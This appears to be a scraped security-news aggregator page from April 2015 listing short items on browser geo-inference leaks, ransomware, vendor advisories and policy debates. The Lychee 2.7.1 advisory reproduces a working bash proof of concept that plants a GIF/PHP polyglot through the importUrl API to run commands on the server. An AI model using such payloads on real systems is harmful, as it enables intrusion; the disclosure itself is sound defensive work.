Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

'Geo-inference' can reveal your location in all mainstream browsers

April 16, 2015, 1:24 pm
$
0
0
Many of the world’s most popular websites and browsers are leaking your location, right down to your country, city, neighborhood, and home address, according to new research from the National University of Singapore.

A “geo-inference attack” allows virtually anyone with a website—even if they don’t have your permission—to narrow down a person’s country, city, and neighborhood by measuring the timing of browser cache queries related to increasingly ubiquitous geo-location services like Google and Craigslist.

more here........http://www.dailydot.com/crime/geo-inference-attack-google-craigslist-maps/
Search

Minecraft Vulnerability Advisory

April 16, 2015, 1:25 pm

Flash EK Strikes Again via Google’s DoubleClick

April 16, 2015, 1:26 pm

Exploit kits (still) pushing Teslacrypt ransomware

April 16, 2015, 1:28 pm
$
0
0
Teslacrypt is a form of ransomware that was first noted in January of this year [1].  This malware apparently targets video game-related files [2, 3, 4].  I've seen Teslacrypt dropped by the Sweet Orange exploit kit (EK) [5], and it's also been dropped by Nuclear EK [6].  McAfee saw it dropped by Angler EK last month [2].

I saw it again on Wednesday 2015-04-15 from Nuclear EK.  Let's take a look at the traffic here....https://isc.sans.edu/diary/Exploit+kits+(still)+pushing+Teslacrypt+ransomware/19581

Lychee 2.7.1 remote code execution

April 16, 2015, 1:30 pm
$
0
0 
Advisory ID: SGMA15-002
Title:  Lychee remote code execution
Product: Lychee
Version: 2.7.1 and probably prior
Vendor: lychee.electerious.com
Vulnerability type:     Remote Code Execution
Risk level:     High
Credit: Filippo Cavallarin - segment.technology
CVE: N/A
Vendor notification: 2015-04-12
Vendor fix: 2015-04-13
Public disclosure: 2015-04-15


Details

Lychee version 2.7.1 and probably below suffers from remote code execution vulnerability.

The vulnerability resides in the importUrl function that fails to restrict file types due to the lack of file extension 
validation.
Since the imported file is stored in a web-readable directory where php files can be executed, remote code execution 
can be achieved. 

Even if the import is limited to image files only, an attacker can abuse this vulnerability by importing a 
specially crafted image file containing PHP code.

To exploit this vulnerability the attacker must be logged as administrator.

The following proof of concept demostrates the issue

#!/bin/bash

LYCHEE_HOST="lychee.local"
PHPSESSID="e0ac560kmqf0lli9u5jd20qt46"
LOCALIP="172.16.85.1"
CMD="uname -a"

cd /tmp || exit 1

echo "Creating gif..."
GIF="\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x21\xFE\x1A<?php system('$CMD')?>"
echo -e $GIF > gif.php

echo "Starting local webserver"
python -m SimpleHTTPServer > /dev/null 2>&1 &

sleep 1

echo "Starting the import procedure"
curl "http://$LYCHEE_HOST/php/api.php"; -H "Cookie: PHPSESSID=$PHPSESSID"  --data 
"function=importUrl&url=http%3A//$LOCALIP:8000/gif.php&albumID=0"

sleep 5

kill %1
rm gif.php

echo "Executing command.."
curl "http://$LYCHEE_HOST/data/gif.php";

#EOF


Solution

Upgrade to Lychee version 2.7.2


References
http://lychee.electerious.com




Filippo Cavallarin
https://segment.technology/

Open Litespeed Use After Free Vulnerability

April 16, 2015, 3:07 pm
$
0
0
(    , )     (,
  .   '.' ) ('.    ',
   ). , ('.   ( ) (
  (_,) .'), ) _ _,
 /  _____/  / _  \    ____  ____   _____
 \____  \==/ /_\  \ _/ ___\/  _ \ /     \
 /       \/   |    \\  \__(  <_> )  Y Y  \
/______  /\___|__  / \___  >____/|__|_|  /
        \/         \/.-.    \/         \/:wq
                    (x.0)
                  '=.|w|.='
                  _=''"''=.

                presents..

Open Litespeed Use After Free Vulnerability
Affected versions: Open Litespeed <= 1.3.9

PDF:
http://www.security-assessment.com/files/documents/advisory/Open%20Litespeed%20Use%20After%20Free%20Vulnerability.pdf

+-----------+
|Description|
+-----------+
A use after free vulnerability was discovered within the header parser
of the Open Litespeed web server. This vulnerability can be successfully
exploited to trigger an out of bounds memory read, resulting in a
segmentation fault crashing the web server

+------------+
|Exploitation|
+------------+
By sending a crafted request, an attacker may trigger an out-of-bounds
memory read, crashing the web server. This is due to a portion of memory
being referenced by the application after being freed by a realloc() call.

The second parameter (p) to the memmove() call (line 741, httpreq.cpp)
within the HttpReq:newKeyValueBuf method results in an out of bound
memory read when the attacker submits a crafted requests contain a large
number of header rows. This is is due to the portion of memory the 'p'
parameter resides in being freed by a realloc() call. The reallocation
is performed by the allocate() method of the AutoBuf class. This is
triggered by the call to AutoBuf's grow() method within the
newKeyValueBuf method (line 736, httpreq.cpp). The newKeyValueBuf method
snippet is detailed below, showing the call to AutoBuf::Grow() and the
subsequent memmove() call:

 735         if ( m_reqBuf.available() < total )
 736             if ( m_reqBuf.grow( total ) )
 737                 return NULL;
 738         char * pNewBuf = m_reqBuf.end();
 739         m_reqBuf.used( total );
 740         if ( orgSize > 0 )
 741             memmove( pNewBuf, p, sizeof( int ) * 2 + sizeof(
key_value_pair ) * orgSize );
 742         else
 743             *( ((int *)pNewBuf) + 1 ) = 0;

Further information is available in the advisory PDF. POC exploit code
can be found at
http://www.security-assessment.com/files/documents/advisory/openlitespeed-1.3.9-UAF-DOS.c



+----------+
| Solution |
+----------+
Update to the latest version of the Open Litespeed web server

+-------------------+
|Disclosure Timeline|
+-------------------+
26/03/2015 - Advisory send to Litespeed
27/03/2015 - Response from Litespeed stating the vulnerability will be
fixed in the next release of Open Litespeed
10/04/2015 - Open Litespeed 1.3.10 released
14/04/2015 - Advisory PDF released

+-----------------------------+
|About Security-Assessment.com|
+-----------------------------+

Security-Assessment.com is Australasia's leading team of Information
Security
consultants specialising in providing high quality Information Security
services to clients throughout the Asia Pacific region. Our clients include
some of the largest globally recognised companies in areas such as finance,
telecommunications, broadcasting, legal and government. Our aim is to
provide
the very best independent advice and a high level of technical expertise
while
creating long and lasting professional relationships with our clients.

Security-Assessment.com is committed to security research and development,
and its team continues to identify and responsibly publish vulnerabilities
in public and private software vendor's products. Members of the
Security-Assessment.com R&D team are globally recognised through their
release
of whitepapers and presentations related to new security research.

For further information on this issue or any of our service offerings,
contact us:

Web www.security-assessment.com
Email info () security-assessment com
Phone +64 4 470 1650

PHP 5.6.8 is released

April 16, 2015, 3:47 pm

Reverse Engineered: Capcom CPS1 - Part 1

April 16, 2015, 3:49 pm
$
0
0
For most of the 80's, arcade titles were the product of intense hardware and software custom design work. With every new game title came a new board design and the full dedication of multiple specialized teams including experts in hardware, electronics, software, game design, graphics, sound... the list goes on and on.

Competition, faster release cycles, and the need for continued improved financial results, drove arcade manufacturers into operational optimization and standardization efforts with the ultimate goal of focusing into their true core business: producing successful video games, not hardware.

With the introduction in 1988 of the Capcom Play System 1 (CPS-1) by Capcom, the company signaled a new era in game design quality and hardware platform maturity.

more here.........http://arcadehacker.blogspot.com/2015/04/capcom-cps1-part-1.html
Search

TECHNOLOGISTS OPPOSE CISA/INFORMATION SHARING BILLS

April 16, 2015, 11:03 pm
$
0
0
Today we sent a letter to lawmakers expressing security experts' opposition to the Cybersecurity Information Sharing Act (CISA) as well as two other pending bills that purport to be about security information sharing, the Protecting Cyber Networks Act (PCNA), and the National Cybersecurity Protection Advancement Act of 2015. These experts agree that the information sharing bills unnecessarily waive privacy rights because they focus on sharing information beyond that needed for cybersecurity.

more here........http://cyberlaw.stanford.edu/blog/2015/04/technologists-oppose-cisainformation-sharing-bills

Beyond annoyance: security risks of unwanted ad injectors

April 17, 2015, 2:36 am

KAPERSKY RANSOMWARE DECRYPTOR

April 17, 2015, 5:43 am
$
0
0
The National High Tech Crime Unit (NHTCU) of the Netherlands’ police, the Netherlands’ National Prosecutors Office and Kaspersky Lab have been working together to fight the CoinVault ransomware campaign. During our joint investigation we have been able to obtain data that can help you to decrypt the files being held hostage on your PC. We provide both decryption keys and the decryption application.

more here.........https://noransom.kaspersky.com/

CVE-2014-5370 - Arbitrary File Retrieval + Deletion In New Atlanta BlueDragon CFChart Servlet

April 17, 2015, 5:45 am
$
0
0
Vulnerability title: Arbitrary File Retrieval + Deletion In New Atlanta BlueDragon CFChart Servlet
CVE: CVE-2014-5370
Vendor: New Atlanta
Product: BlueDragon CFChart Servlet
Affected version: 7.1.1.17759
Fixed version: 7.1.1.18527
Reported by: Mike Westmacott
Details:

The CFChart servlet of BlueDragon (component com.naryx.tagfusion.cfm.cfchartServlet) is vulnerable to arbitrary file retrieval due to a directory traversal vulnerability. In certain circumstances the retrieved file is also deleted.


PITM

April 17, 2015, 5:47 am

WikiLeaks publishes an analysis and search system for The Sony Archives: 30,287 documents from Sony Pictures Entertainment (SPE)

April 17, 2015, 5:49 am
$
0
0
WikiLeaks publishes an analysis and search system for The Sony Archives: 30,287 documents from Sony Pictures Entertainment (SPE) and 173,132 emails, to and from more than 2,200 SPE email addresses.

more here......https://wikileaks.org/sony/press/

Apache Cassandra JMX/RMI Remote Code Execution & Cisco Cloud Web Security Connector JMX/RMI Remote Code Execution

April 17, 2015, 5:53 am
$
0
0
Apache Cassandra was found to bind an unauthenticated JMX/RMI service on all network interfaces. An adversary with network access may abuse this service and achieve arbitrary remote code execution as the running user.

more here...........https://labs.mwrinfosecurity.com/advisories/2015/04/17/apache-cassandra-jmxrmi-remote-code-execution/


A vulnerability exists in Cisco Cloud Web Security Connector which allows unauthenticated users to gain unauthorised access with administrative privileges on the target host. Cisco confirmed this vulnerability and assigned CVE-2015-0689

more here..........https://labs.mwrinfosecurity.com/advisories/2015/04/17/cisco-cloud-web-security-connector-jmxrmi-remote-code-execution/
Search

MS15-034 Detection: Some Observations

April 17, 2015, 5:54 am

MONITORING ZEUS P2P AND DYREZA WITH MALWARE LOFTS

April 17, 2015, 5:56 am
$
0
0
Many malicious binaries use a command and control server centralised on a dedicated domain, which is simple to operate but likely to be shut down by specialised companies like Lexsi or LEAs. Malware authors have been using decentralised network infrastructures for a few years to ensure their botnet will be more resilient, implying the development of new tools to monitor their evolution. CERT-LEXSI is using “lofts” for that purpose, that is to say virtual machines specially configured to decrypt communications in real time and extract banking malware configuration files and look for newly targeted banks.

more here..........http://www.lexsi-leblog.com/cert-en/monitoring-zeus-p2p-dyreza-malware-lofts.html

Security expert pulled off flight by FBI after exposing airline tech vulnerabilities

April 17, 2015, 5:59 am
$
0
0
One of the world’s foremost experts on counter-threat intelligence within the cybersecurity industry, who blew the whistle on vulnerabilities in airplane technology systems in a series of recent Fox News reports, has become the target of an FBI investigation himself.

Chris Roberts of the Colorado-based One World Labs, a security intelligence firm that identifies risks before they're exploited, said two FBI agents and two uniformed police officers pulled him off a United Airlines Boeing 737-800 commercial flight Wednesday night just after it landed in Syracuse, and spent the next four hours questioning him about cyberhacking of planes.

more here........http://www.foxnews.com/us/2015/04/17/security-expert-pulled-off-flight-by-fbi-after-exposing-airline-tech/

So, you won a regional and you’re headed to National CCDC

April 17, 2015, 6:42 am

Match.com’s HTTP-only login page puts millions of passwords at risk

April 17, 2015, 7:35 am
Viewing all 8064 articles
Browse latest View live
Search